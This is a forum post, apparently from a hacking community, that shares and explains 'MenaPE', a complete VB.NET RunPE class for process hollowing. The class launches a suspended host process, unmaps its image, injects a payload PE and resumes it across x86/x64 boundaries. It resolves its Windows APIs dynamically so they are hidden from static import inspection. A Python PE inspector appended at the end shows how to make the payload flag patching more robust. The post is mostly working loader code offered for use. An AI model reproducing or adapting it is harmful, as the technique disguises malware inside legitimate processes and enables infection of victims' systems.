
MenaPE Usage! .Net RunPE x86<>x64!

Killpot

Yo.

So in this thread I will detail how to go about using Menalix's RunPE, called MenaPE. Here's a snippet of his description:

What I love about .NET is how we can manipulate it in all kinds of ways, because the code is JIT compiled.
And this is kind of what this RunPE shows: normal RunPEs can only do x86 -> x86 injections.
This RunPE can do ANY injection, yes, even x86 -> x64 or x64 -> x86.

Why? Well, .NET is JIT compiled, which means it isn't really compiled yet when creating a .NET executable;
a .NET executable is like a wrapped executable file with the instructions for how it's going to be JIT compiled at run time, so before it runs we can manipulate it just like we want.
Which means we can do RunPE injections like x64 -> x86.

So, how do we go about using this code?
Code:
Option Strict Off 'The class relies on late binding (Context is declared without a type) and on implicit Integer/IntPtr conversions
Imports System.Diagnostics

Class MenaPE

   '------------------------------
   'Title: MenaPE (RunPE Class)
   'Author: Menalix
   'Website: Menalix.com
   'Notice: For teaching purposes
   '------------------------------

#Region "Static API Calls"

   Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
   Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As IntPtr, ByVal Name As String) As IntPtr
#End Region

#Region "Dynamic API Caller"

   'Resolves an export at run time through LoadLibraryA/GetProcAddress and wraps it in a typed delegate,
   'so the APIs below do not appear as static Declare imports of the assembly.
   Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
       Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
   End Function

#End Region

#Region "Dynamic API's"

   Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
   ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")

   Private Delegate Function CreateProcessParameters( _
   ByVal ApplicationName As String, _
   ByVal CommandLine As String, _
   ByVal ProcessAttributes As IntPtr, _
   ByVal ThreadAttributes As IntPtr, _
   ByVal InheritHandles As Boolean, _
   ByVal CreationFlags As UInteger, _
   ByVal Environment As IntPtr, _
   ByVal CurrentDirectory As String, _
   ByRef StartupInfo As STARTUPINFO, _
   ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
   Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")

   Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
   ByVal ProcessInformationClass As Integer, _
   ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
   ByVal ProcessInformationLength As UInteger, _
   ByRef ReturnLength As UIntPtr) As UInteger
   ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")

   'Bound to Wow64GetThreadContext at run time; it fills a 32-bit CONTEXT for a WOW64 thread from a 64-bit caller
   Private Delegate Function GetThreadContext64Parameters( _
   ByVal hThread As IntPtr, _
   ByRef lpContext As CONTEXT32) As Boolean
   Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing

   Private Delegate Function IsWow64ProcessParameters( _
   ByVal hProcess As IntPtr, _
   ByRef Wow64Process As Boolean) As Boolean
   ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")

   Private Delegate Function WriteProcessMemoryParameters( _
   ByVal hProcess As IntPtr, _
   ByVal lpBaseAddress As IntPtr, _
   ByVal lpBuffer As Byte(), _
   ByVal nSize As UInteger, _
   ByRef lpNumberOfBytesWritten As UInteger) As Boolean
   ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")

   Private Delegate Function NtUnmapViewOfSectionParameters( _
   ByVal hProcess As IntPtr, _
   ByVal pBaseAddress As IntPtr) As UInteger
   ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")

   Private Delegate Function VirtualAllocExParameters( _
   ByVal hProcess As IntPtr, _
   ByVal lpAddress As IntPtr, _
   ByVal dwSize As UInteger, _
   ByVal flAllocationType As UInteger, _
   ByVal flProtect As UInteger) As IntPtr
   ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")

   Private Delegate Function ResumeThreadParameters( _
   ByVal hThread As IntPtr) As UInteger
   ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")

#End Region

#Region "API Structures"
   Private Structure PROCESS_INFORMATION
       Public hProcess As IntPtr
       Public hThread As IntPtr
       Public dwProcessId As UInteger
       Public dwThreadId As UInteger
   End Structure
   Private Structure STARTUPINFO
       Public cb As UInteger
       Public lpReserved As String
       Public lpDesktop As String
       Public lpTitle As String
       <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
       Public Misc As Byte() 'dwX .. dwFlags (8 DWORDs), wShowWindow and cbReserved2 (2 WORDs) = 36 bytes
       Public lpReserved2 As IntPtr 'LPBYTE in the native structure, so it must be pointer sized for the 64-bit layout to line up
       Public hStdInput As IntPtr
       Public hStdOutput As IntPtr
       Public hStdError As IntPtr
   End Structure
   Structure FLOATING_SAVE_AREA
       Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
       <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
       Dim State As UInteger
   End Structure
   Structure CONTEXT32 'x86 CONTEXT, also the layout Wow64GetThreadContext fills
       Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
       Dim FloatSave As FLOATING_SAVE_AREA
       Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
       <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
   End Structure
   Structure PROCESS_BASIC_INFORMATION
       Public ExitStatus As IntPtr
       Public PebBaseAddress As IntPtr
       Public AffinityMask As IntPtr
       Public BasePriority As IntPtr
       Public UniqueProcessID As IntPtr
       Public InheritedFromUniqueProcessId As IntPtr
   End Structure
#End Region

#Region "Injection"

   Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
       For I As Integer = 1 To 5 'Retries the whole sequence up to five times; each failed attempt kills its host process
           If HandleRun(path, payload, creationflag) Then Return True
       Next
       Return False
   End Function

   Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
       Dim ReadWrite As Integer = Nothing
       Dim QuotedPath As String = String.Format("""{0}""", Path)

       Dim SI As New STARTUPINFO
       Dim PI As New PROCESS_INFORMATION

       SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'CreateProcess validates the structure by its size, so cb must hold sizeof(STARTUPINFO)

       Try
           'COMMENT: Creates the host process; creationflag is expected to include CREATE_SUSPENDED (&H4) so the primary thread has not run yet and the image can be replaced before it does.
           If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()

           'COMMENT: Variables used by the steps below
           Dim ProccessInfo As New PROCESS_BASIC_INFORMATION
           Dim RetLength As UInteger
           Dim Context = Nothing
           Dim PEBAddress32 As Integer = Nothing
           Dim PEBAddress64 As Int64 = Nothing
           Dim TargetIs64 As Boolean = Nothing
           Dim IsWow64Proc As Boolean = False

           IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: True only for a 32-bit process running under WOW64 on 64-bit Windows; False for a 32-bit process on 32-bit Windows and for any 64-bit process.
           If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: The target is a WOW64 process, or we ourselves are a 32-bit process
               Context = New CONTEXT32
               Context.ContextFlags = &H1000002L 'COMMENT: ContextFlags as shipped. In winnt.h CONTEXT_i386 Or CONTEXT_INTEGER is &H10002 and CONTEXT_AMD64 Or CONTEXT_INTEGER is &H100002; &H1000002 is neither, so check this value first if Wow64GetThreadContext fails.
               If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: We are 64-bit and the target is a 32-bit WOW64 process
                   GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: The native 64-bit GetThreadContext cannot fill a 32-bit CONTEXT, so the Wow64 variant is resolved here
                   If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
                   Console.WriteLine(Context.Ebx) 'Debug output left in by the author
                   PEBAddress32 = Context.Ebx 'COMMENT: In a freshly created, still suspended 32-bit process EBX of the primary thread holds the PEB address
                   TargetIs64 = False
               Else 'COMMENT: We are 32-bit, so the target's PEB is reachable through NtQueryInformationProcess
                   NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Class 0 is ProcessBasicInformation, which returns PebBaseAddress
                   PEBAddress32 = ProccessInfo.PebBaseAddress
                   TargetIs64 = False
               End If
           Else 'COMMENT: We are 64-bit and the target is a native 64-bit process
               NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Class 0 is ProcessBasicInformation, which returns PebBaseAddress
               PEBAddress64 = ProccessInfo.PebBaseAddress
               TargetIs64 = True
           End If

           Dim BaseAddress As IntPtr
           If TargetIs64 = True Then
               ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: PEB.ImageBaseAddress sits at +&H10 in the 64-bit PEB; only the low 4 bytes of the 8-byte pointer are read here
           Else
               ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: PEB.ImageBaseAddress sits at +&H8 in the 32-bit PEB
           End If

           Dim PayloadIs64 As Boolean = False
           Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: e_lfanew, the file offset of the "PE\0\0" signature
           Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Assumes the Flags field of the CLR (IMAGE_COR20) header sits at this fixed file offset. The authoritative location is the CLR Runtime Header data directory (index 14), so this only holds for payloads laid out like the ones the author tested
           Dim wMachine As Integer = BitConverter.ToUInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: IMAGE_FILE_HEADER.Machine, read unsigned so that &H8664 does not come back as a negative Int16

           If wMachine = &H8664 Then 'COMMENT: IMAGE_FILE_MACHINE_AMD64 is &H8664 (34404); IMAGE_FILE_MACHINE_I386 is &H14C
               PayloadIs64 = True
           Else
               PayloadIs64 = False
           End If

           If PayloadIs64 = False Then
               If dwNetDirFlags = &H3 Then 'COMMENT: &H3 = COMIMAGE_FLAGS_ILONLY (&H1) Or COMIMAGE_FLAGS_32BITREQUIRED (&H2), i.e. the payload was compiled for x86 only; an AnyCPU payload is already &H1 and is left alone
                   Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'COMMENT: Clears 32BITREQUIRED and keeps ILONLY, so the CLR treats the IL-only payload as AnyCPU and a 64-bit host will load it; this is what makes the 32-bit -> 64-bit case work
               End If
           End If

           Dim dwImageBase As Integer
           If PayloadIs64 = True Then
               dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'COMMENT: PE32+ stores ImageBase as 8 bytes at optional header offset &H18 (PE signature + &H30); only the low 4 bytes are read into an Integer here
           Else
               dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'COMMENT: PE32 stores ImageBase as 4 bytes at optional header offset &H1C (PE signature + &H34); &H400000 is the usual default for 32-bit executables
           End If

           If dwImageBase = BaseAddress Then 'COMMENT: The host image already occupies the range the payload wants, so it is unmapped first; otherwise VirtualAllocEx below fails on the overlap
               If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Returns an NTSTATUS; 0 is STATUS_SUCCESS
           End If

           Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50) 'COMMENT: OptionalHeader.SizeOfImage (same offset in PE32 and PE32+)
           Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: MEM_COMMIT Or MEM_RESERVE (&H3000), PAGE_EXECUTE_READWRITE (&H40), at the payload's preferred base
           If dwNewImageBase = 0 Then Throw New Exception()

           Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54) 'COMMENT: OptionalHeader.SizeOfHeaders
           If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'COMMENT: Copies the DOS, PE, optional and section headers to the new base

           'COMMENT: Maps every section from its file position (PointerToRawData) to its in-memory position (VirtualAddress), the work the image loader would otherwise do
           Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
           Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2) 'COMMENT: The section table starts directly after the optional header, which begins at PE signature + &H18
           Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
           For I As Integer = 0 To NumberOfSections - 1
               Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
               Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
               Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
               If Not SizeOfRawData = 0 Then 'COMMENT: Sections without raw data (e.g. .bss) are already zero-filled by VirtualAllocEx
                   Dim SectionData(SizeOfRawData - 1) As Byte
                   Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
                   If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
               End If
               SectionOffset += &H28 'COMMENT: sizeof(IMAGE_SECTION_HEADER) is 40 bytes
           Next

           Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
           If TargetIs64 = True Then
               If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'COMMENT: Points PEB.ImageBaseAddress of the 64-bit target at the new image (low 4 bytes only)
           Else
               If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'COMMENT: Points PEB.ImageBaseAddress of the 32-bit target at the new image
           End If
           'COMMENT: Only PEB.ImageBaseAddress is rewritten; the thread context (the host's entry point) is left exactly as CreateProcess set it up
           If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'COMMENT: Resumes the primary thread; ResumeThread returns (DWORD)-1 on failure

       Catch ex As Exception
           'COMMENT: Kills the half-patched host if one was created; GetProcessById throws for an id that does not exist, so it is guarded
           If PI.dwProcessId <> 0 Then
               Try
                   Process.GetProcessById(CInt(PI.dwProcessId)).Kill()
               Catch
               End Try
           End If
           Return False
       End Try

       Return True
   End Function
#End Region

End Class
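As an added example (my code, not Menalix's and not part of the original post), here is a Python inspector that pulls the same header fields MenaPE reads (e_lfanew, Machine, ImageBase, SizeOfImage, SizeOfHeaders, the section table) but resolves the CLR runtime header through data directory 14 instead of the fixed PE+&H398 file offset, and reports the CorFlags that decide whether a 64-bit host will load the image. The class's own flag rewrite at PE+&H398 is what makes the 32-bit -> 64-bit case work: it clears COMIMAGE_FLAGS_32BITREQUIRED, and that flag, rather than JIT compilation as such, is what the loader consults. The sample PE the script runs on is constructed inline (minimal headers, one .text section, a COR20 header, no code) and is not compiler output; the 8-byte PE32+ ImageBase is included because the class reads only its low 4 bytes.

```python
import struct

# Constants from winnt.h / corhdr.h
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DIR_CLR_RUNTIME_HEADER = 14          # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
COMIMAGE_FLAGS_ILONLY = 0x1
COMIMAGE_FLAGS_32BITREQUIRED = 0x2
COMIMAGE_FLAGS_32BITPREFERRED = 0x20000
COR20_FLAGS_OFFSET = 0x10            # Flags field inside IMAGE_COR20_HEADER


def rva_to_offset(rva, sections):
    """Translate an RVA to a file offset through the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def parse_pe(data):
    """Read the header fields a loader (or a hollowing routine) depends on."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                      # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 0x18                                                   # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 0x1C)[0]
        ndirs_off, dirs = opt + 0x5C, opt + 0x60
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 0x18)[0]    # 8-byte ImageBase
        ndirs_off, dirs = opt + 0x6C, opt + 0x70
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 0x38)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    sections, off = [], opt + opt_size          # section table follows the optional header
    for _ in range(nsec):
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append(dict(name=name, vsize=vsize, va=va, rawsize=rawsize, rawptr=rawptr))
        off += 0x28                              # sizeof(IMAGE_SECTION_HEADER)
    cor_flags = cor_flags_offset = None
    if ndirs > DIR_CLR_RUNTIME_HEADER:
        clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 8 * DIR_CLR_RUNTIME_HEADER)
        if clr_rva and clr_size:                 # managed image: locate COR20 through the sections
            cor_flags_offset = rva_to_offset(clr_rva, sections) + COR20_FLAGS_OFFSET
            cor_flags = struct.unpack_from("<I", data, cor_flags_offset)[0]
    return dict(machine=machine, magic=magic, image_base=image_base,
                size_of_image=size_of_image, size_of_headers=size_of_headers,
                sections=sections, cor_flags=cor_flags, cor_flags_offset=cor_flags_offset)


def classify(info):
    """How the CLR will treat the image; CorFlags, not the JIT, decides x86-vs-x64 loading."""
    is_amd64 = info["machine"] == IMAGE_FILE_MACHINE_AMD64
    flags = info["cor_flags"]
    if flags is None:
        return "native x64" if is_amd64 else "native x86"
    if is_amd64:
        return "managed x64"
    if flags & COMIMAGE_FLAGS_32BITREQUIRED:
        return "managed x86 only (32BITREQUIRED)"
    if flags & COMIMAGE_FLAGS_32BITPREFERRED:
        return "managed AnyCPU, 32-bit preferred"
    return "managed AnyCPU"


def set_cor_flags(data, new_flags):
    """Copy of the image with CorFlags rewritten at its resolved offset (what corflags.exe /32BITREQ- does)."""
    info = parse_pe(data)
    if info["cor_flags_offset"] is None:
        raise ValueError("not a managed image")
    out = bytearray(data)
    struct.pack_into("<I", out, info["cor_flags_offset"], new_flags)
    return bytes(out)


def build_sample_pe(cor_flags, plus=False):
    """Constructed minimal image for the demo: one .text section and a COR20 header, no code."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                           # e_lfanew
    pe, opt_size = 0x80, (0xF0 if plus else 0xE0)
    img[pe:pe + 4] = b"PE\0\0"
    machine = IMAGE_FILE_MACHINE_AMD64 if plus else IMAGE_FILE_MACHINE_I386
    struct.pack_into("<HHIIIHH", img, pe + 4, machine, 1, 0, 0, 0, opt_size, 0x102)
    opt = pe + 0x18
    if plus:
        struct.pack_into("<HQ", img, opt, PE32PLUS_MAGIC, 0)          # magic; ImageBase written below
        struct.pack_into("<Q", img, opt + 0x18, 0x140000000)
        ndirs_off, dirs = opt + 0x6C, opt + 0x70
    else:
        struct.pack_into("<H", img, opt, PE32_MAGIC)
        struct.pack_into("<I", img, opt + 0x1C, 0x400000)
        ndirs_off, dirs = opt + 0x5C, opt + 0x60
    struct.pack_into("<II", img, opt + 0x38, 0x4000, 0x200)           # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", img, ndirs_off, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", img, dirs + 8 * DIR_CLR_RUNTIME_HEADER, 0x2008, 72)
    sec = opt + opt_size
    img[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", img, sec + 8, 0x100, 0x2000, 0x200, 0x200)  # VSize, VA, RawSize, RawPtr
    struct.pack_into("<IHH", img, 0x208, 72, 2, 5)                    # COR20 at RVA 0x2008: cb, runtime 2.5
    struct.pack_into("<I", img, 0x208 + COR20_FLAGS_OFFSET, cor_flags)
    return bytes(img)


if __name__ == "__main__":
    x86_only = build_sample_pe(COMIMAGE_FLAGS_ILONLY | COMIMAGE_FLAGS_32BITREQUIRED)
    info = parse_pe(x86_only)
    print(classify(info), "CorFlags at", hex(info["cor_flags_offset"]))  # a fixed PE+0x398 guess would hit 0x418
    print(classify(parse_pe(set_cor_flags(x86_only, COMIMAGE_FLAGS_ILONLY))))
    print(classify(parse_pe(build_sample_pe(COMIMAGE_FLAGS_ILONLY, plus=True))))
```

With e_lfanew = 0x80 the sample's CorFlags field resolves to file offset 0x218, while PE+&H398 would point at 0x418, which is why a payload built by a different compiler or linker version can slip past the class's flag rewrite even though its CLR header is perfectly ordinary; the data-directory walk is the check to run before trusting any fixed offset.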